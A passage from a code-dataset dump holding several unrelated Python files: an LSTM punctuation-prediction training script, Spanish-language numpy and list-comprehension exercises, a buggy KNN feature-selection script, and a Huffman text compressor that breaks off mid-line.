int(sys.argv[1])\nvocabulary_size= int(sys.argv[2])\nembedding_size = int(sys.argv[3])\nhidden_size = int(sys.argv[4])\nbatch_size = int(sys.argv[5])\nno_question = int(sys.argv[6])\noptimizer_ = sys.argv[7]\npatience_ = int(sys.argv[8])\n\n#chunk_size = 200\n#vocabulary_size= 20000\n#embedding_size = 100\n#hidden_size = 256\n#batch_size = 200\n#no_question = 0\n#optimizer\t\t= \t\"adam\"\n#patience_\t\t=\t2\n\n# In[4]:\n#### READ TRAIN ####\nif no_question==1:\n\traw = codecs.open('train2012_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('train2012', 'r', \"ISO-8859-1\").readlines()\nenv = []\nfor line in raw:\n stripped_line = line.split()\n #print (stripped_line)\n env.append(stripped_line)\n\nall_x=[]\n\nfor i in(range(len(env))):\n if (len(env[i])==2):\n all_x.append(env[i])\n\nX = [x[0] for x in all_x]\ny = [x[1] for x in all_x]\n\nall_text = [c for x in X for c in x]\n\nx_chunks=[]\ny_chunks=[]\nfor group in chunker(X, chunk_size):\n x_chunks.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_chunks.append(group)\n\n### CREATE VOCABULARY ###\n\n# Count the word frequencies\nword_freq = nltk.FreqDist(X)\nprint (\"Found %d unique words tokens.\" % len(word_freq.items()))\n\nwords = word_freq.most_common(vocabulary_size)\n\n\nvocab=[\"\"]+[x[0] for x in words]\nvocab.append(\"UNKNOWN\")\nvocab.append(\"\")\n\n### TRANSFORM TEXTS #\nword2ind = {word: index for index, word in enumerate(vocab)}\nind2word = {index: word for index, word in enumerate(word2ind)}\n\n\n\nlabels = ['O','COMMA','PERIOD']\nif no_question==0:\n labels.append('QUESTION')\nlabel2ind = {label: (index + 1) for index, label in enumerate(labels)}\nind2label = {(index + 1): label for index, label in enumerate(labels)}\n\nprint (label2ind)\n\nprint ('Vocabulary size:', len(word2ind), len(label2ind))\n\nmaxlen = max([len(x) for x in x_chunks])\nprint ('Maximum sequence length:', maxlen)\n\nunknown_token=\"UNKNOWN\"\n\nfor i, sent in enumerate(x_chunks):\n x_chunks[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_chunks]\nmax_label = max(label2ind.values()) + 1\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_chunks]\n\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen, padding=\"post\")\n\ntrain_len=int(len(X_enc))\n\nX_train = X_enc[:train_len]\ny_train = y_enc[:train_len]\n\n\n\n### READ DEV ###\nif no_question==1:\n\traw = codecs.open('dev2012_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('dev2012', 'r', \"ISO-8859-1\").readlines()\n\nprint (raw[1])\nenv = []\nfor line in raw:\n stripped_line = line.split()\n #print (stripped_line)\n env.append(stripped_line)\n\nall_x_dev=[]\nfor i in(range(len(env))):\n if (len(env[i])==2):\n all_x_dev.append(env[i])\n else:\n print (env[i])\n\nX = [x[0] for x in all_x_dev]\ny = [x[1] for x in all_x_dev]\n\nall_text = [c for x in X for c in x]\n\nx_dev=[]\ny_dev=[]\nfor group in chunker(X, chunk_size):\n x_dev.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_dev.append(group)\n\n\nprint ('Vocabulary size:', len(word2ind), len(label2ind))\n\nmaxlen_ = max([len(x) for x in x_dev])\nprint ('Maximum sequence length:', maxlen)\n### TRANSFORM TEXTS #\n\nfor i, sent in enumerate(x_dev):\n x_dev[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_dev]\nmax_label = max(label2ind.values())+1\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_dev]\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\n\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\nprint (len(y_enci))\nprint (y_enci[0].shape)\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen, padding=\"post\")\n\nval_len=int(len(X_enc)*1.0)\nX_val = X_enc[:val_len]\ny_val = y_enc[:val_len]\n\n\n### READ TEST ###\nif no_question==1:\n\traw = codecs.open('test2011_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('test2011', 'r', \"ISO-8859-1\").readlines()\n\nprint (raw[1])\nall_x_test = []\nfor line in raw:\n stripped_line = line.split()\n #print (stripped_line)\n all_x_test.append(stripped_line)\n\nX = [x[0] for x in all_x_test]\ny = [x[1] for x in all_x_test]\n\nall_text = [c for x in X for c in x]\n\nx_test=[]\ny_test=[]\nfor group in chunker(X, chunk_size):\n x_test.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_test.append(group)\n\n### TRANSFORM TEXTS #\nfor i, sent in enumerate(x_test):\n x_test[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_test]\n\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_test]\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\n\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen, padding=\"post\")\n\ntest_len=int(len(X_enc)*1.0)\n\nX_test = X_enc[:test_len]\ny_test = y_enc[:test_len]\n\n### READ TEST ASR###\nif no_question==1:\n\traw = codecs.open('test2011asr_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('test2011asr', 'r', \"ISO-8859-1\").readlines()\n\nall_x_test_asr = []\nfor line in raw:\n stripped_line = line.split()\n all_x_test_asr.append(stripped_line)\n\nX = [x[0] for x in all_x_test_asr]\ny = [x[1] for x in all_x_test_asr]\n\nall_text = [c for x in X for c in x]\n\nx_test_asr=[]\ny_test_asr=[]\nfor group in chunker(X, chunk_size):\n x_test_asr.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_test_asr.append(group)\n\n### TRANSFORM TEXTS #\nfor i, sent in enumerate(x_test_asr):\n x_test_asr[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_test_asr]\nmax_label = max(label2ind.values())+1\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_test_asr]\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen)\n\ntest_asr_len=int(len(X_enc)*1.0)\n\nX_test_asr = X_enc[:test_asr_len]\ny_test_asr = y_enc[:test_asr_len]\nprint (len(X_test_asr))\n\n\n\nmax_features = len(word2ind)\nout_size = len(label2ind)\n\n### CREATE EMBEDDING ###\nnb_words = min(vocabulary_size, len(word2ind))\nprint (nb_words)\nprint (embedding_size)\n\nembedding_matrix = np.zeros((nb_words + 3, embedding_size))\nfor word, i in word2ind.items():\n if i > nb_words:\n continue\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None: # Initialized embedding_vector\n embedding_matrix[i] = embedding_vector\n\nprint ('Number of remaining lines from embedding matrix:', len(embedding_matrix))\n### CREATE RNN model with LSTM ###\nmodel = Sequential()\nmodel.add(Embedding(nb_words+3, embedding_size, input_length=maxlen,weights=[embedding_matrix],mask_zero=True))\nmodel.add(LSTM(hidden_size, return_sequences=True,init='glorot_normal'))\nmodel.add(TimeDistributedDense(out_size))\nmodel.add(Activation('softmax'))\n\nearlyStopping=keras.callbacks.EarlyStopping(monitor='val_loss',patience=patience_,verbose=0)\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer_, metrics=['accuracy','precision','recall','fmeasure'])\nmodel.fit(X_train, y_train, batch_size=batch_size, nb_epoch=100, validation_data=(X_val, y_val),callbacks=[earlyStopping], shuffle=True)\nscore_model = model.evaluate(X_test, y_test, batch_size=batch_size)\nprint('Raw test score:', score_model)\n\n\n### EVALUATION TRAIN ###\npr = model.predict_classes(X_train)\nyh = y_train.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Training accuracy:', accuracy_score(fyh, fpr))\nprint ('Training confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n\n### EVALUATION DEV ###\npr = model.predict_classes(X_val)\nyh = y_val.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Validation accuracy:', accuracy_score(fyh, fpr))\nprint ('Validation confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n\n### EVALUATION TEST ###\n# In[51]:\n\npr =model.predict_classes(X_test)\nyh = y_test.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Testing accuracy:', accuracy_score(fyh, fpr))\nprint ('Testing confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n\n\n### EVALUATION TEST ASR###\npr =model.predict_classes(X_test_asr)\nyh = y_test_asr.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Testing ASR accuracy:', accuracy_score(fyh, fpr))\nprint ('Testing ASR confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n","sub_path":"uniLSTM_GLOVE_EN.py","file_name":"uniLSTM_GLOVE_EN.py","file_ext":"py","file_size_in_byte":11122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"525359151","text":"#!/usr/bin/env python\r\n'''\r\nNumpy [Python]\r\nEjercicios de práctica\r\n---------------------------\r\nAutor: Inove Coding School\r\nVersion: 1.2\r\n\r\nDescripcion:\r\nPrograma creado para poner a prueba los conocimientos\r\nadquiridos durante la clase\r\n'''\r\n\r\n__author__ = \"Emmanuel Oscar Torres Molina\"\r\n__email__ = \"emmaotm@gmail.com\"\r\n__version__ = \"1.2\"\r\n\r\nimport numpy as np\r\nimport math\r\nimport random\r\nfrom random import randrange\r\n\r\n\r\ndef ej1():\r\n # Lambda expression\r\n # 1)\r\n # Realizar una funcion lambda que eleve al cuadrado\r\n # el número pasado como parámetro\r\n\r\n # potencia_2 = lambda x:......\r\n # pot_3 = potencia_2(3)\r\n\r\n numero = float(input('\\n\\nIngrese un Número: '))\r\n potencia_2 = lambda x: x**2\r\n potencia_numero = potencia_2(numero)\r\n print('\\nLa Potencia de 2 del Número Ingresado es: {}\\n\\n'.format(potencia_numero))\r\n\r\n # 2)\r\n # Utilice la función map para mapear una lambda expression\r\n # que retorne la potencia de 2 de cada numero en la lista numeros\r\n # El resultado (la potencia de cada numero) se debe ir almacenando\r\n # en una nueva lista\r\n # Nota: realizar la lambda expression \"in line\", es decir,\r\n # no declarar la lambda fuera del map sino diretamente dentro\r\n # Copiar la lambda creada en el paso anterior dentro del map\r\n # NOTA: No debe usar \"potencia_2\" dentro del map, debe colocar\r\n # directamente la lambda.\r\n\r\n # Lista de numeros\r\n numeros = [1, -5, 4, 3]\r\n\r\n # numeros_potencia = list(map....)\r\n numeros_potencia = list(map(lambda x: x**2, numeros))\r\n print('Lista Original: {}'.format(numeros))\r\n print('La Lista de Números Elevados al Cuadrado: {}\\n\\n'.format(numeros_potencia))\r\n\r\n\r\ndef ej2():\r\n # Lambda expression\r\n # 1)\r\n # Realizar una funcion lambda que retorne el tamaño\r\n # (len) de un string pasado como parámetro\r\n\r\n string = str(input('\\n\\nIngrese una Cadena de Caracteres: '))\r\n\r\n # len_string = lambda......\r\n len_string = (lambda x: len(x))(string)\r\n print('La Cadena de Caracteres que Ingresó posee {} Caracteres.\\n\\n'.format(len_string))\r\n\r\n # 2)\r\n # Lista de string\r\n palabras = ['Inove', 'casa', 'programacion']\r\n\r\n # Utilice la función map para mapear una lambda expression\r\n # que retorne el tamaño (len) de cada texto em cata iteración\r\n # de la lista de textos\r\n # El resultado (el len de cada palabra) se debe ir almacenando\r\n # en una nueva lista\r\n # Nota: realizar la lambda expression \"in line\"\r\n # Copiar la lambda creada en el paso anterior dentro del map\r\n # NOTA: No debe usar \"len_string\" dentro del map, debe colocar\r\n # directamente la lambda.\r\n\r\n # palabras_len = list(map....)\r\n palabras_len = list(map(lambda x: len(x), palabras))\r\n print('Lista Original: {}'.format(palabras))\r\n print('El Tamaño de Cada elemento de la Lista Original es: {}\\n\\n'.format(palabras_len))\r\n\r\n\r\n\r\ndef ej3():\r\n # Práctica de comprensión de listas\r\n # 1)\r\n # Generar una lista a partir de comprensión de listas,\r\n # esta lista generada deberá tener un tamaño de 11\r\n # números, conteniendo del 0 al 10 inclusive\r\n\r\n # lista_0_10 = [......]\r\n lista_0_10 = [numero for numero in range(0, 11)] # Compresión de Listas.\r\n print('\\n\\nLa Lista Generada es: {}\\n\\n'.format(lista_0_10))\r\n\r\n # 2)\r\n # Generar una lista a partir de comprensión de listas,\r\n # esta lista generada deberá contener la tabla del 5,\r\n # desde el múltiplo 0 al múltiplo 10\r\n # El resultado esperado es:\r\n # [0 5 10 15 20 25 30 35 40 45 50]\r\n # Utilizar comprensión de listas para generar essa lista\r\n # Lo esperable es que realicen una lista de 11 elementos,\r\n # del 0 al 10 (como el ejer anterior) pero que cada\r\n # elemento lo multipliquen x5.\r\n\r\n # tabla_5 = [......]\r\n tabla_5 = [(numero * 5) for numero in range(0, 11)]\r\n print('\\n\\nLa Lista Generada es: {}\\n\\n'.format(tabla_5))\r\n\r\n\r\n # 3)\r\n # Generar una lista a partir de comprensión de listas,\r\n # esta lista generada deberá contener 10 números aleatorios,\r\n # estos números deberán estar entre el rango 1 al 30 representando\r\n # números posibles de un mes (los números pueden repetirse).\r\n # NOTA: Importar le módulo random y utiliza randrange\r\n # o randint para generar números aleatorios.\r\n # https://docs.python.org/3/library/random.html\r\n\r\n # dias_mes = [.....]\r\n dias_mes = [randrange(1,31,1) for dia in range(0, 11) ]\r\n print('La Lista Generada es: {}\\n\\n'.format(dias_mes))\r\n\r\n\r\ndef ej4():\r\n # Utilizar comprensión de listas con condicionales\r\n\r\n # 1)\r\n # Utilizar comprensión de listas para convertir\r\n # una lista de números como str en números tipo int\r\n # sería un conversor string --> int\r\n # Ojo! Tener cuidado con lo string/caracteres\r\n # que no son números, utilizar condicionales para detectarlos\r\n # reemplazar dicho str \"no numérico\" por 0\r\n # TIP: Recomendamos ver el método \"isdigit\" de strings\r\n # para aplicar en este caso.\r\n list_numeros_str = ['5', '2', '3', '', '7', 'NaN']\r\n conv_str_int = [(int(elemento) if (elemento.isdigit( ) is True) else 0) for elemento in list_numeros_str]\r\n print('\\n\\nLista Original: {}'.format(list_numeros_str))\r\n print('La Lista Original Convertida a una Lista de Números es: {}\\n\\n'.format(conv_str_int))\r\n\r\n # ¿Ya terminaron el ejercicio? ¿Por qué no prueban\r\n # hacer negativo alguno de los números de la lista?\r\n # ¿Qué sucede con isdigit? Sorprendente no? \r\n\r\n list_numeros_str = ['-5', '2', '-3', '', '7', 'NaN'] \r\n conv_str_int = [(int(elemento) if (elemento.isdigit( ) is True) else 0) for elemento in list_numeros_str]\r\n print('Lista Original: {}'.format(list_numeros_str))\r\n print('La Lista Original Convertida a una Lista de Números es: {}'.format(conv_str_int))\r\n print('Se Observa que Si se Hace Negativo un Número de la Lista Original, el método \"isdigit( )\" no la Toma como un Número.\\n\\n')\r\n\r\n\r\ndef ej5():\r\n # Utilizar comprensión de listas para filtrar\r\n\r\n accesos = [10, 50, 7, 5, 15, 25, 3, 4, 13]\r\n\r\n # La lista accesos contiene los números de ID de personal\r\n # que ingresaron por ese molinete\r\n\r\n # 1)\r\n # Generar una lista por comprensión de la lista \"accesos\"\r\n # una lista que solo contenga (filtrado) los ID de personal\r\n # entre 1 al 10 inclusive, se desea separar del grupo de accesos\r\n # los ID entre el 1 y 10.\r\n # De la lista resultante informar cuantas personas/personal\r\n # comprendido en dicho rango pasó por ese molinete\r\n\r\n # personal_1_10 = [.....]\r\n personal_1_10 = [id for id in accesos if (1 <= id <= 10)]\r\n print('\\n\\nLa Lista de Accesos de Personal es: {}'.format(accesos))\r\n print('La Lista Filtrada es: {}'.format(personal_1_10))\r\n print('La Cantidad de Personal que Ingresó por ese Molinete es de: {} Personas.\\n\\n'.format(len(personal_1_10)))\r\n\r\n # 2)\r\n # Generar una lista por comprensión de la listas \"accesos\"\r\n # cuyo ID de personal esté dentro de los ID válidos para ingresar\r\n # por ese molinete:\r\n id_validos = [3, 4, 7, 8, 15]\r\n # Debe generar una nueva lista basada en \"accesos\" filtrada por los ID\r\n # aprobados en \"id_validos\".\r\n # TIP: Utilizar el operador \"in\" para chequear si un ID de accesos está\r\n # dentro de \"id_validos\"\r\n\r\n # personal_valido = [.....]\r\n personal_valido = [id for id in accesos if (id in id_validos)]\r\n print('La Lista de ID Válidos es: {}\\n\\n'.format(personal_valido))\r\n\r\n\r\ndef ej6():\r\n # Ejercicio de funciones Numpy\r\n # Arme un array con el método np.arange\r\n # el cual este acotado entre 0 y 1000\r\n # De dicho array calcular las siguientes operaciones:\r\n\r\n # 1)\r\n # Calcular la suma de todos los elementos en el array\r\n # utilizar el método \"sum\" de numpy\r\n\r\n # suma = ....\r\n array_int = np.arange(0, 1000)\r\n print('\\n\\nLa Lista de Números es:\\n{}'.format(array_int))\r\n suma = np.sum(array_int)\r\n print('\\nLa Suma de los Números de la Lista es: {}\\n\\n'.format(suma))\r\n\r\n # 2)\r\n # Calcular la diferencia de todos los elementos en el array\r\n # utilizar el método \"diff\" de numpy\r\n\r\n # diferencia = ....\r\n diferencia = np.diff(array_int)\r\n print('La Diferencia de los Números de la Lista es:\\n{}\\n\\n'.format(diferencia))\r\n\r\n # 3)\r\n # Utilizar la funcion \"where\" para reemplazar los números múltiplos\r\n # de \"5\" por un \"0\"\r\n # Ojo: ¿Que operador matemático utilizará para saber si un número es\r\n # múltiplo de \"5\"? Ese operador ya lo conoce y lo viene utilizando\r\n # bastante para saber si un número es múltiplo de \"2\"\r\n\r\n # nuevo_array = ....\r\n nuevo_array = np.where((array_int % 5) != 0, array_int, 0) \r\n print('La Nueva Lista con los Números que Son Múltiplos de 5 es:\\n{}\\n\\n'.format(nuevo_array))\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"\\n\\nBienvenidos a otra clase de Inove con Python\")\r\n ej1()\r\n ej2()\r\n ej3()\r\n ej4()\r\n ej5()\r\n ej6()\r\n","sub_path":"ejercicios_practica.py","file_name":"ejercicios_practica.py","file_ext":"py","file_size_in_byte":9045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"94698218","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 16 11:59:10 2019\r\n\r\n@author: guptap\r\n\"\"\"\r\n\r\n# Logistic Regression\r\n\r\nfrom itertools import permutations\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv(r'E:\\CS400 Fall 2019\\breast_cancer_dataset.csv') #Prediction\r\ndataset = dataset.dropna()\r\ndataset = dataset.reset_index(drop=True)\r\ncolNames = dataset.columns.values.tolist()\r\n\r\nscoringList = []\r\ncolumnList1 = []\r\ncolumnList2 = []\r\nknn_scores = []\r\n\r\na = np.arange(0,7,1)\r\nperm = list(permutations(a, 2))\r\n\r\nfor i in perm: \r\n X = dataset.iloc[:, [i[0], i[1]]].values\r\n y = dataset.iloc[:, 9].values\r\n \r\n # Splitting the dataset into the Training set and Test set\r\n from sklearn.model_selection import train_test_split\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\r\n \r\n # Feature Scaling\r\n from sklearn.preprocessing import StandardScaler\r\n sc = StandardScaler()\r\n X_train = sc.fit_transform(X_train)\r\n X_test = sc.transform(X_test)\r\n \r\n # Fitting K-NN to the Training set\r\n from sklearn.neighbors import KNeighborsClassifier\r\n \r\n for k in range(1,21):\r\n knn_classifier = KNeighborsClassifier(n_neighbors = k)\r\n knn_classifier.fit(X_train, y_train)\r\n knn_scores.append(knn_classifier.score(X_test, y_test))\r\n \r\n ind = np.argmax(knn_scores)\r\n columnList1.append(i[0])\r\n columnList2.append(i[1])\r\n \r\n classifier = KNeighborsClassifier(n_neighbors = ind+1, metric = 'minkowski', p = 2)\r\n classifier.fit(X_train, y_train)\r\n \r\n # Predicting the Test set results\r\n y_pred = classifier.predict(X_test)\r\n \r\n # calculate accuracy\r\n scoring = metrics.accuracy_score(y_test,y_predict)\r\n \r\n columnList1.append(i[0])\r\n columnList2.append(i[1])\r\n scoringList.append(scoring)\r\n \r\nind = np.argmax(scoringList)\r\nprint (columnList1[ind],columnList2[ind] )\r\n\r\nfreq = Counter(scoringList)\r\nfinalColums = np.where(scoringList)\r\nprint(finalColums)\r\n","sub_path":"Classification/10 25/Oct 25th Classification KNN.py","file_name":"Oct 25th Classification KNN.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"47183579","text":"import os, sys, heapq\r\n\r\nclass HuffmanNode:\r\n\tdef __init__(self, freq, char=None, left=None, right=None):\r\n\t\tself.freq = freq\r\n\t\tself.char = char\r\n\t\tself.left = left\r\n\t\tself.right = right\r\n\r\n\tdef __lt__(self, other):\r\n\t\treturn self.freq < other.freq\r\n\r\n\tdef isLeafNode(self):\r\n\t\treturn self.left == None and self.right == None\r\n\r\n\r\nclass HuffmanEncoder:\r\n\tdef __init__(self, source, dest):\r\n\t\tself.input_file = open(source, 'r')\r\n\t\tself.input_file.seek(0, 2)\r\n\t\tself.EOF = self.input_file.tell()\r\n\t\tself.input_file.seek(0, 0)\r\n\t\tself.freqDict = {}\r\n\t\tself.HuffmanCodes = {}\r\n\t\tself.allChar = []\r\n\t\tself.output_file = open(dest, 'wb')\r\n\t\tself.root = None\r\n\r\n\tdef countCharFreq(self):\r\n\t\tadvance = True\r\n\t\twhile advance:\r\n\t\t\tchar = self.input_file.read(1)\r\n\t\t\tself.allChar.append(char)\r\n\t\t\tif char in self.freqDict:\r\n\t\t\t\tself.freqDict[char] += 1\r\n\t\t\telse:\r\n\t\t\t\tself.freqDict[char] = 1\r\n\r\n\t\t\tif(self.input_file.tell() == self.EOF):\r\n\t\t\t\tadvance = False\r\n\r\n\tdef buildHuffmanTree(self):\r\n\t\tnodes = []\r\n\t\tfor char in self.freqDict:\r\n\t\t\tnodes.append(HuffmanNode(self.freqDict[char], char))\r\n\r\n\t\theapq.heapify(nodes)\r\n\r\n\t\twhile(len(nodes) > 1):\r\n\t\t\tleft_child = heapq.heappop(nodes)\r\n\t\t\tright_child = heapq.heappop(nodes)\r\n\t\t\tblank_parent_node = HuffmanNode(left_child.freq + right_child.freq, left=left_child, right=right_child)\r\n\t\t\theapq.heappush(nodes, blank_parent_node)\r\n\r\n\t\treturn heapq.heappop(nodes)\r\n\r\n\tdef inOrderHuffmanCode(self, rootNode, binary_code_str=''):\r\n\t\tif rootNode != None:\r\n\t\t\tself.inOrderHuffmanCode(rootNode.left, binary_code_str + '0')\r\n\t\t\tif rootNode.isLeafNode():\r\n\t\t\t\tself.HuffmanCodes[rootNode.char] = binary_code_str\r\n\t\t\tself.inOrderHuffmanCode(rootNode.right, binary_code_str + '1')\r\n\r\n\tdef encodeFile(self):\r\n\t\tdef toBytes(encoded_string):\r\n\t\t\tbyte = bytearray()\r\n\t\t\tfor i in range(0, len(encoded_string), 8):\r\n\t\t\t\tbyte.append(int(encoded_string[i:i+8], 2))\r\n\t\t\treturn bytes(byte)\r\n\r\n\t\tdef encodeHuffmanTree(node, encoded_tree):\r\n\t\t\tif node.char is not None:\r\n\t\t\t\tencoded_tree += \"1\"\r\n\t\t\t\tencoded_tree += \"{0:08b}\".format(ord(node.char))\r\n\t\t\telse:\r\n\t\t\t\tencoded_tree += \"0\"\r\n\t\t\t\tencoded_tree = encodeHuffmanTree(node.left, encoded_tree)\r\n\t\t\t\tencoded_tree = encodeHuffmanTree(node.right, encoded_tree)\r\n\t\t\treturn encoded_tree\r\n\r\n\t\tdef padEncodedString(self, encoded_string):\r\n\t\t\tencoded_tree = encodeHuffmanTree(self.root, \"\")\r\n\t\t\tpadding = 8 - (len(encoded_string) + len(encoded_tree)) % 8\r\n\t\t\tfor i in range(padding):\r\n\t\t\t\tencoded_string += \"0\"\r\n\r\n\t\t\tpadded_info = \"{0:08b}\".format(padding)\r\n\t\t\tencoded_string = encoded_tree + padded_info + encoded_string\r\n\t\t\treturn encoded_string\r\n\r\n\t\tencoded_string = ''\r\n\t\tfor char in self.allChar:\r\n\t\t\tencoded_string += self.HuffmanCodes[char]\r\n\r\n\t\tself.output_file.write(toBytes(padEncodedString(self, encoded_string)))\r\n\t\tself.output_file.close()\r\n\r\n\r\n\r\nclass HuffmanDecoder():\r\n\tdef __init__(self, source, dest):\r\n\t\tself.input_file = open(source, 'rb')\r\n\t\tself.output_file = open(dest, 'w')\r\n\r\n\tdef decodeFile(self):\r\n\t\tdef decodeHuffmanTree(binary_string):\r\n\t\t\tbit = binary_string[0]\r\n\t\t\tdel binary_string[0]\r\n\r\n\t\t\tif bit == \"1\":\r\n\t\t\t\tchar = \"\"\r\n\t\t\t\tfor x in range(8):\r\n\t\t\t\t\tchar += binary_string[0]\r\n\t\t\t\t\tdel binary_string[0]\r\n\r\n\t\t\t\treturn HuffmanNode(freq=None, char=chr(int(char, 2)))\r\n\t\t\treturn HuffmanNode(freq=None, left=decodeHuffmanTree(binary_string), right=decodeHuffmanTree(binary_string))\r\n\t\t\r\n\t\tdef removePadding(binary_string):\r\n\t\t\tpadding_info = binary_string[:8]\r\n\t\t\tpadding_len = int(\"\".join(padding_info), 2)\r\n\r\n\t\t\tpadding_info_removed = binary_string[8:]\r\n\t\t\tpadding_removed_string = padding_info_removed[:-1*padding_len]\r\n\t\r\n\t\t\treturn padding_removed_string\r\n\r\n\t\tdef decodeText(encoded_string, rootNode):\r\n\t\t\tcurr_node = rootNode\r\n\t\t\tdecoded_string = ''\r\n\r\n\t\t\tfor char in encoded_string:\r\n\t\t\t\tcurr_node = curr_node.left if char == \"0\" else curr_node.right\r\n\r\n\t\t\t\tif curr_node.char is not None:\r\n\t\t\t\t\tdecoded_string += curr_node.char\r\n\t\t\t\t\tcurr_node = rootNode\r\n\r\n\t\t\treturn decoded_string\r\n\r\n\t\tbinary_string = ''\r\n\t\tbyte = self.input_file.read(1)\r\n\t\twhile(len(byte) > 0):\r\n\t\t\tbyte = ord(byte)\r\n\t\t\tbits = bin(byte)[2:].rjust(8, '0')\r\n\t\t\tbinary_string += bits\r\n\t\t\tbyte = self.input_file.read(1)\r\n\r\n\t\tbinary_string = list(binary_string)\r\n\t\trootNode = decodeHuffmanTree(binary_string)\r\n\t\tencoded_string = removePadding(binary_string)\r\n\t\tdecoded_string = decodeText(encoded_string, rootNode)\r\n\t\tself.output_file.write(decoded_string)\r\n\r\n\r\n\r\ndef printCompressionRate(input_path, output_path):\r\n\tinput_file_size = os.path.getsize(input_path)\r\n\toutput_file_size = os.path.getsize(output_path)\r\n\tcompression_rate = round((input_file_size - output_file_size)/input_file_size * 100)\r\n\tprint(\"Compression Successful. Details:\")\r\n\tprint(\"Original File Size: \", input_file_size)\r\n\tprint(\"Compressed File Size: \", output_file_size)\r\n\tprint(\"New File Is\", compression_rate, \"% Of The Original File.\\n\")\r\n\r\ndef runEncoder(encoder, input_path, output_path):\r\n\tencoder.countCharFreq()\r\n\theadNode = encoder.buildHuffmanTree()\r\n\tencoder.inOrderHuffmanCode(headNode)\r\n\tencoder.root = headNode\r\n\tencoder.encodeFile()\r\n\tprintCompressionRate(input_path, output_path)\r\n\r\ndef main():\r\n\tmode = sys.argv[1]\r\n\tinput_path = sys.argv[2]\r\n\tif mode == 'compress':\r\n\t\tif os.path.isfile(input_path):\r\n\t\t\toutput_path = input_path.split('.')[0] + 'Compressed.bin'\r\n\t\t\tencoder = HuffmanEncoder(input_path, output_path)\r\n\t\t\trunEncoder(encoder, input_path, output_path)\r\n\t\telse:\r\n\t\t\tfiles = [file for file in os.listdir(input_path) if file.endswith(\".txt\")]\r\n\t\t\tfor f in files:\r\n\t\t\t\toutput_path = input_path + '/' + f.split('.')[0] + 'Compressed.bin'\r\n\t\t\t\tencoder = HuffmanEncoder(input_path + '/' + f, output_path)\r\n\t\t\t\trunEncoder(encoder, input_path + '/' + f, output_path)\r\n\telif mode == 'decompress':\r\n\t\tif os.path.isfile(input_path):\r\n\t\t\toutput_path = input_path.split('.')[0][:-1*len('Compressed')] + 'Decompressed.txt'\r\n\t\t\tdecoder = HuffmanDecoder(input_path, output_path)\r\n\t\t\tdecoder.decodeFile()\r\n\t\t\tprint(\"Decompression Successful.\")\r\n\t\telse:\r\n\t\t\tfiles = [file for file in os.listdir(input_path) if 